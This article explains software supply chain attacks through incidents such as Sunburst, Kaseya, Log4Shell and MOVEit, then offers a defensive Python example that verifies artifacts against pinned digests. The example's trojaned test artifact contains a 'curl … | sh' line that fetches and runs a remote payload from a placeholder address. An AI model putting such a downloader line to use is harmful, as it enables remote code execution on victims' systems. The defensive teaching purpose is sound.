Inside Supply Chain Attacks
Recent supply chain attacks
Supply chain attacks have made headlines for a decade, and they are arriving with increasing regularity. They involve malicious code embedded in a trusted product, hardware or software, which then compromises the organizations that use that product. By targeting a single supplier, threat actors exploit the trust relationship to gain a foothold in many of its customers, potentially exposing thousands or even millions of victims. The scale of the threat is staggering; here are just a few examples:
- Salt Typhoon (ongoing). A Chinese state-sponsored threat actor dubbed Salt Typhoon was found to have had access to the networks of major global telecommunications providers for several years as part of an extensive cyber espionage campaign.
- Sunburst (2020). Discovered in late 2020 and attributed to Russia’s foreign intelligence service (SVR), the attackers compromised the build environment at SolarWinds and covertly inserted a backdoor into a digitally signed Orion DLL, so the trojaned update carried a valid signature and installed like any legitimate release. (CVE-2020-10148, often cited alongside it, is a separate Orion API authentication bypass disclosed in the same period, not an identifier for the backdoor.) The backdoored update reached thousands of organizations, although only about 100 appear to have been specifically targeted, including Cisco and Microsoft, and the US Department of Defense and Treasury Department. The incident is described in detail by Wired (paywall), and by SolarWinds CEO Sudhakar Ramakrishna at RSA Conference 2021.
- Kaseya (2021). The REvil ransomware group exploited a zero-day vulnerability in Kaseya’s on-premises VSA servers and used VSA’s own update mechanism to push ransomware to its MSP customers and, through them, their clients. Over 1,500 businesses were impacted as a result.
- Log4j (Log4Shell, CVE-2021-44228): A zero-day vulnerability disclosed in late 2021 in Apache Log4j, an open-source Java logging library used by hundreds of millions of devices and web applications globally. Because a crafted string in any logged field could trigger a JNDI lookup and unauthenticated remote code execution, it received the maximum Common Vulnerability Scoring System (CVSS) base score of 10.0 (“Critical”), requiring a massive global effort to patch servers.
- MOVEit (CVE-2023-34362): A zero-day SQL injection vulnerability in Progress Software’s MOVEit Transfer application allowed attackers to bypass authentication, access the back-end database, and exfiltrate sensitive data from thousands of organizations globally.
- PowerSchool (2025): A massive data breach that took place in late 2024 came to light in January 2025, in which a 19-year-old stole the personal information of millions of students and teachers from PowerSchool. Although a reported US$2.85 million ransom was paid, the agreement was not honored, and in May 2025 some school boards received new ransom demands, indicating that the data had never been destroyed as promised.
- Instructure Canvas (2026): In May 2026 the ShinyHunters extortion group breached Instructure’s Canvas Learning Management System (LMS) by exploiting weak identity controls on “Free-For-Teacher” accounts, and claimed to have stolen over 3.65 terabytes of data from thousands of schools and millions of individuals.
- TeamPCP (2026): Early in 2026, TeamPCP began targeting the tools used by developers in order to plant malicious payloads in code used by thousands of companies. The particularly insidious aspect of their approach is that their dozens of attacks have included open-source security software such as the Trivy security scanner (CVE-2026-33634) and Checkmarx’s KICS, an Infrastructure as Code (IaC) tool for detecting misconfigurations and vulnerabilities before deployment.
These attacks illustrate the scale and the logic of supply chain attacks. One successful attack can compromise the data of thousands of customers, or more. While the objectives vary with the attacker and the victim, from financial extortion to hacktivism to espionage, the consequences can be severe. Open-source libraries have become targets because, as the Ransom-ISAC team noted, “underfunded open-source package maintainers are the most efficient entry point into the supply chains of virtually every organization on earth.”
The problem
The move to cloud-based services over the last two decades has created a perfect storm for attackers. SaaS built with security as an afterthought has left supply chains more vulnerable than ever. “Move fast and break things” was reportedly Facebook’s internal motto (changed in 2014 to “move fast with stable infrastructure”), and it is clearly a call for functionality, not security. This is hardly surprising: the behavior and priorities of software developers follow their customers’ dollars. When was the last time you heard a purchasing agent ask whether a SaaS offering followed Secure by Design development principles?
What to do
Being aware of the risk of a supply chain attack is an important first step. Although some attacks are sophisticated, many are quite basic and can be thwarted by basic controls. Supply Chain Risk Management (SCRM) starts with a risk assessment that establishes which assets need protection, what risks your suppliers pose, and what impact a breach would have. The assessment then drives a strategy for minimizing the impact of a supply chain breach.
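One of the basic controls mentioned above, as an added example that is not from the original article or from any vendor named in it: record a digest for every third-party artifact you deploy and fail closed when a download does not match, is missing, or was never pinned. The pin-file format, the tool names (scanner-cli, iac-linter, helper-plugin), the artifact contents and the test address in the appended payload are all constructed for illustration.

```python
"""Added example, not code from the original article: a fail-closed check that
verifies third-party artifacts against pinned SHA-256 digests before use.
The pin-file format, artifact names and artifact contents are constructed."""
import hashlib
import hmac
import re
from dataclasses import dataclass

# Constructed pin-file format: "<name> <version> sha256:<64 hex chars>", with
# '#' comments. A real deployment pins whatever its package manager or vendor
# publishes (requirements hashes, a release checksum file, and so on).
PIN_RE = re.compile(
    r"^(?P<name>\S+)\s+(?P<version>\S+)\s+sha256:(?P<digest>[0-9a-fA-F]{64})$"
)


@dataclass(frozen=True)
class Pin:
    name: str
    version: str
    digest: str  # lowercase hex SHA-256 of the known-good artifact


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_pins(text: str) -> dict[str, Pin]:
    """Parse the pin file strictly: a malformed or duplicate line is an error,
    because a pin file that is silently half-read offers no protection."""
    pins: dict[str, Pin] = {}
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = PIN_RE.match(line)
        if m is None:
            raise ValueError(f"pin file line {lineno}: malformed entry {raw!r}")
        pin = Pin(m["name"], m["version"], m["digest"].lower())
        if pin.name in pins:
            raise ValueError(f"pin file line {lineno}: duplicate pin for {pin.name}")
        pins[pin.name] = pin
    return pins


def verify_artifacts(pins: dict[str, Pin], artifacts: dict[str, bytes]) -> dict[str, str]:
    """Return a verdict per name: 'ok', 'tampered', 'unpinned' (downloaded but
    never pinned) or 'missing' (pinned but not downloaded). Only 'ok' may be
    installed; every other verdict fails closed."""
    verdicts: dict[str, str] = {}
    for name, data in artifacts.items():
        pin = pins.get(name)
        if pin is None:
            verdicts[name] = "unpinned"
        elif hmac.compare_digest(sha256_hex(data), pin.digest):
            verdicts[name] = "ok"
        else:
            verdicts[name] = "tampered"
    for name in pins.keys() - artifacts.keys():
        verdicts[name] = "missing"
    return verdicts


# Constructed artifacts standing in for vendor tool releases. The trojaned copy
# is the clean build with a stage-two downloader appended after the pin was
# recorded (203.0.113.5 is a documentation-only test address).
CLEAN_SCANNER = b'#!/bin/sh\n# scanner-cli 1.4.2\nexec scan "$@"\n'
CLEAN_LINTER = b'#!/bin/sh\n# iac-linter 0.9.0\nexec lint "$@"\n'
TROJANED_SCANNER = CLEAN_SCANNER + b"curl -fsSL http://203.0.113.5/s | sh\n"

# Constructed pin file, recorded from the clean builds.
PIN_FILE = f"""\
# name          version   pinned digest
scanner-cli     1.4.2     sha256:{sha256_hex(CLEAN_SCANNER)}
iac-linter      0.9.0     sha256:{sha256_hex(CLEAN_LINTER)}
"""


def run_example() -> dict[str, str]:
    pins = parse_pins(PIN_FILE)
    downloaded = {
        "scanner-cli": TROJANED_SCANNER,    # tampered after the pin was taken
        "iac-linter": CLEAN_LINTER,         # matches its pin
        "helper-plugin": b"echo plugin\n",  # never pinned: rejected, not allowed
    }
    return verify_artifacts(pins, downloaded)


if __name__ == "__main__":
    for name, verdict in sorted(run_example().items()):
        print(f"{name:15} {verdict}")
```

Run as written, the tampered scanner-cli is reported as tampered and the unpinned plugin is rejected rather than waved through. The caveat is the Sunburst case above: a pin recorded from a release that was already backdoored in the supplier’s build environment, and then signed, will match that backdoor. Digest pinning defends against substitution after you recorded a known-good reference, not against a compromised build pipeline.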
The mitigation strategy will be unique to every organization, based on its suppliers, customers, assets and so on, and its scope will vary accordingly. Unfortunately, this means there is no one-size-fits-all solution, so rather than offer a potentially misleading (or worse!) “Top 5 Things You Should Do To Protect Against Supply Chain Attacks” list, we suggest you review the links in the References section below. The good news is that by getting this far, you have already taken the first step.
References: